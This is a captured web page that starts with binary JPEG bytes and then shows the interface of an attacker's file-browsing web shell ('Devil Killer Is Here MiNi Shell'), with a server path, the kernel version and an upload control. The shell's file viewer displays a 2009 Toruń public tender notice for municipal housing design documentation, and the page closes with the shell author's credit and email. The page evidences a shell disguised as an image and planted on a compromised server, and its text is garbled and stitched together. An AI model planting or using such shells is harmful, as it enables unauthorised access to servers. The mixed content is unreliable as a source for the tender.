JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090108/7903-N-2009.html

<p class="kh_header"><b>Toruń: Przedmiotem zamówienia jest wykonanie dokumentacji projektowej budowlanej i wykonawczej budynków mieszkalnych komunalnych i socjalnych wraz  z uzbrojeniem i zagospodarowaniem terenu na nieruchomościach przy ul. Armii Ludowej  73-81 i ul. Okólnej 11-13 od strony ul. Andersa w Toruniu  (działka nr 15/23).</b><br>
<b>Numer ogłoszenia: 7903 - 2009; data zamieszczenia: 08.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Toruń reprezentowana przez Prezydenta Miasta Torunia , ul. Wały gen. Sikorskiego 8, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6118713, faks 056 6118622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> um.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej budowlanej i wykonawczej budynków mieszkalnych komunalnych i socjalnych wraz  z uzbrojeniem i zagospodarowaniem terenu na nieruchomościach przy ul. Armii Ludowej  73-81 i ul. Okólnej 11-13 od strony ul. Andersa w Toruniu  (działka nr 15/23)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zakres dokumentacji projektowej obejmuje:
-	kompleksową dokumentację wielobranżową budynków mieszkalnych,
-	zagospodarowanie terenu wraz z komunikacją i uzbrojeniem.

2.	Założenia do realizacji przedmiotu umowy:
-	Materiałem wyjściowym do projektowania jest wyrys i wypis z miejscowego planu zagospodarowania przestrzennego miasta Torunia dla obszaru objętego opracowaniem przy ul. Armii Ludowej/Andersa.
-	Planowana jest zabudowa wielorodzinna typu klatkowego, ze ściśle określonymi na rysunku planu obowiązującymi liniami zabudowy. Maksymalna ilość kondygnacji - 4, bez podpiwniczenia, dach płaski. Maksymalne posadowienie posadzki parteru budynku nad poziomem     ulic - 1m.
-	Założeniem Zamawiającego jest uzyskanie maksymalnej z możliwych liczby mieszkań przy zachowaniu niezbędnych funkcji towarzyszących. Średnia powierzchnia użytkowa mieszkań  ok. 45 m2, w przewadze mieszkania dwupokojowe. 
-	Przewidywane są mieszkania komunalne i socjalne, wg następującego podziału:
1) 44 lokali komunalnych, w tym:
60% - lokale 2-pokojowe
30% - lokale 3-pokojowe
10% - lokale 1-pokojowe
2) 40 lokali socjalnych, w tym:
70% - lokale 2-pokojowe
10% - lokale 3-pokojowe
20% - lokale 1- pokojowe
-	Zaopatrzenie w energię i wodę z sieci miejskiej.
-	Odprowadzenie ścieków do miejskiej sieci kanalizacji sanitarnej i deszczowej.
    
4.  Wykaz opracowań wchodzących w skład przedmiotu umowy:
I)  Dokumentacja projektowa budowlana:   
-	Wielobranżowy projekt zagospodarowania terenu,
-	Projekt architektury,
-	Projekt konstrukcji,
-	Projekt instalacji sanitarnych,
-	Projekt instalacji elektrycznych i niskoprądowych,
-	Projekt zabezpieczeń przeciwpożarowych.
 
II)  Dokumentacja projektowa wykonawcza:   
1)   Projekt zagospodarowania terenu:
-	branża:    architektura,
-	branża:  drogi, ukształtowanie terenu i mała architektura - projekt i specyfikacja  techniczna  wykonania i odbioru robót budowlanych,
-	branża:  zieleń - projekt i specyfikacja techniczna wykonania i odbioru robót budowlanych wraz z inwentaryzacją dendrologiczną terenu objętego opracowaniem               z  wycinką drzew i krzewów wraz z naliczeniem odszkodowania za gospodarcze korzystanie ze środowiska  i wprowadzenie w nim zmian,  
-	branża:  przyłącza ( sieci ) wodnokanalizacyjne - projekt i specyfikacja techniczna                   wykonania i odbioru robót budowlanych,
-	branża:   oświetlenie terenu - projekt i specyfikacja techniczna wykonania i odbioru robót budowlanych,
-	branża:  przyłącza teletechniczne - projekt i specyfikacja techniczna wykonania            i odbioru robót budowlanych,
2)	Projekty architektury wraz z kolorystyką,  
3)	Projekt konstrukcji z obliczeniami statycznymi,  
4)	Projekt instalacji sanitarnych ( wod.-kan., c.o., ciepłej wody, kanalizacji deszczowej,                gazowej ),  
5)	Projekt instalacji elektrycznych ( elektrycznych, oświetleniowych, gniazd wtykowych,              przeciwporażeniowych, tablice rozdzielcze, odgromowej ),
6)	Projekty instalacji niskoprądowych,  
7)	Projekt zabezpieczeń przeciwpożarowych,
8)	Inne opracowania wynikające z warunków technicznych dostawców mediów,
9)	Informacje dotyczące bezpieczeństwa i ochrony zdrowia,
10)	Instrukcja bezpieczeństwa pożarowego budynku, 
11)	Specyfikacje techniczne wykonania i odbioru robót budowlanych ( wszystkie branże )+ wersja elektroniczna ( format pdf ),
12)	Kosztorysy inwestorskie + wersja elektroniczna (  format pdf  i ath ),
13)	Przedmiary robót  + wersja elektroniczna ( format pdf  i  ath),  
14)	Zbiorcze zestawienie kosztów inwestycji, w tym:  wynikające z kosztorysów inwestorskich, kosztów wykonania dokumentacji projektowej, nadzorów inwestorskich i autorskich, wynikających z umów przyłączeniowych,  rozbiórek istniejących obiektów, wycinki drzew i innych,
15)	Dokumentacja projektowa budowlana i wykonawcza także w wersji elektronicznej   w formacie pdf,
16)	inne opracowania niezbędne do uzyskania pozwolenia na użytkowanie obiektu.
  
5. Przedmiot zamówienia obejmuje ponadto:
1)	wykonanie mapy syt.-wys. w skali 1:500 z aktualizacją  do celów projektowych, 
2)	wykonanie mapy stanu prawnego terenu objętego projektowaną inwestycją, z aktualnymi   adresami właścicieli i władających nieruchomościami, z naniesieniem na mapie ewidencyjnej gruntów zakresu objętego planem realizacyjnym zagospodarowania terenu,
3)	wykonanie dokumentacji geologiczno-inżynierskiej,
4)	uzyskanie warunków technicznych od właściwych instytucji eksploatujących sieci (na podstawie przygotowanych przez Wykonawcę stosownych wniosków do podpisu przez Zamawiającego),  
5)	przygotowanie dokumentów do wystąpienia o wymagane decyzje administracyjne,  w tym  decyzję  o pozwoleniu na usunięcie drzew i krzewów wraz z nasadzeniami zastępczymi, decyzję pozwoleniu na budowę (przygotowane przez Wykonawcę stosowne wnioski z załącznikami do podpisu przez Zamawiającego).
   
6. Przedmiot zamówienia należy wykonać zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi w tym zakresie przepisami i normami obowiązującymi   w dniu składania wniosku o pozwolenie na budowę,  o którym mowa  w § 1 ust. 5  pkt 5 wzoru umowy.

7.  Opracowany przedmiot zamówienia powinien w szczególności:
1)	spełniać wszystkie warunki określone w art. 34 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (tekst jednolity: Dz.U. z 2006 r. Nr 156, poz. 1118, z późn. zm.), rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. Nr 120, poz. 1133), rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. nr 202, poz. 2072, z późniejszymi zmianami), rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod  i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. nr 130, poz. 1389) oraz ustawy z dnia 27 marca 2003 r.o planowaniu i zagospodarowaniu przestrzennym (Dz.U. Nr 80, poz. 717, z późniejszymi zmianami), z zastrzeżeniem uwzględnienia wszelkich zmian obowiązujących w dniu składania wniosku o pozwolenie na budowę,  o którym mowa w § 1 ust. 5  pkt 5  umowy,  z tym, że do opracowania kosztorysu inwestorskiego Wykonawca stosować będzie ceny jednostkowe robót określone na podstawie danych rynku lokalnego i w oparciu o katalogi, np. Sekocenbud,
2)	posiadać komplet uzgodnień i pozwoleń wymaganych przepisami szczególnymi, w tym uzgodnienie Wydziału Geodezji i Kartografii UMT w zakresie zapewniającym bezkolizyjne położenie projektowanej inwestycji,  
3)	posiadać komplet wymaganych uzgodnień z właścicielami gruntów - zgody właścicieli działek na wejście wykonawcy robót na ich teren w celu realizacji projektowanej inwestycji (w tym zgoda Miejskiego Zarządu Dróg na okresowe zajęcie pasa drogowego w celu realizacji inwestycji), wymagane zgody właścicieli działek i obiektów sąsiadujących  z projektowaną inwestycją, wydane dla Gminy Miasta Toruń, 
4)	zawierać wszystkie niezbędne opinie, oceny, badania, ekspertyzy, rozwiązania ewentualnych kolizji, odwodnienia wykopów i inne niezbędne do prawidłowej realizacji robót i oddania obiektu do użytkowania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.22.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3. O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki:
3.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają
obowiązek posiadania takich uprawnień.
3.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym
i osobami zdolnymi do wykonania zamówienia lub przedstawią zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj:
a) osoby, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia muszą posiadać uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie do projektowania w specjalnościach niezbędnych do wykonania zamówienia tj: uprawnienia do projektowania w specjalności, architektonicznej, konstrukcyjno-budowlanej, specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i kanalizacyjnych, w specjalności instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub w ograniczonym zakresie wydane na podstawie rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r., Nr 83, poz. 578) lub inne odpowiednie wydane na podstawie wcześniej obowiązujących przepisów.
b) wykonawca zrealizował w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 2 usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia tj. 2 dokumentacje projektowe obejmujące swoim zakresem obiekty kubaturowe i o wartości przynajmniej 1 projektu 100 000 zł brutto.
3.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
3.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
3.5. Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia, w takim przypadku złożona oferta
spełniać musi następujące wymagania:
a) w odniesieniu do wymagań postawionych przez Zamawiającego, Wykonawcy muszą udokumentować, że łącznie spełniają warunki określone w art. 22 ust. 1 pkt 1-3 oraz każdy z Wykonawców musi wykazać, że nie podlega wykluczeniu na podstawie art. 24 ust. 1, 2 ustawy,
b) Wykonawcy występujący wspólnie ustanawiają spośród siebie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,
c) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako pełnomocnik..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 4. Dokumenty i oświadczenia składające się na ofertę:
4.1. Wypełniony formularz oferty - załącznik nr 5.
4.2. Zaakceptowany wzór umowy - zał nr 4.
4.3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.4. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na  temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - wypełniony załącznik nr 6.
45. Jeżeli w wykazie , o którym mowa w pkt 4.4, wykonawca wskazał osoby, którymi będzie dysponował
-pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
4.6.Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia (dokumenty potwierdzające posiadanie uprawnień i aktualne zaświadczenie o przynależności do właściwej izby samorządu zawodowego - nr uprawnień).
4.7. Wykaz usług wykonanych w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie) z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców - wypełniony załącznik nr 7.
4.8. Dokumenty potwierdzające, że prace wskazane w tym wykazie (co najmniej 2), zostały wykonane należycie

Oświadczenia:
a) oświadczenie, iż Wykonawca spełnia warunki określone w art. 22 ust. 1 prawa zamówień
publicznych i nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24
ust. 1, 2 prawa zamówień publicznych - załącznik nr 8.
b) oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią
tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy zwalczaniu nieuczciwej konkurencji i
jako takie nie mogą być udostępniane innym uczestnikom postępowania.

Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią
tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec wszystkich dokumentów).

c) oświadczenie wykonawcy jaką cześć zamówienia zamierza powierzyć podwykonawcom (jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale podwykonawców).
Dokumenty, o których mowa w pkt. 4 mogą być przedstawione w formie oryginałów lub kserokopii
poświadczonej za zgodność z oryginałem przez Wykonawcę (oświadczenia, zobowiązania w oryginale).

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zastosowanie mają przepisy § 2 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r.
 w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 ze zm). 

Ocena spełniania warunków udziału w postępowaniu odbywać się będzie na podstawie dokumentów i oświadczeń przedłożonych przez wykonawcę wraz z ofertą, zgodnie z formułą spełnia-nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Torunia
Toruń ul. Wały gen. Sikorskiego 10;
87-100 Toruń
sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.01.2009 godzina 10:00, miejsce: Urząd Miasta Torunia
Toruń ul. Wały gen. Sikorskiego 10;
87-100 Toruń
sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com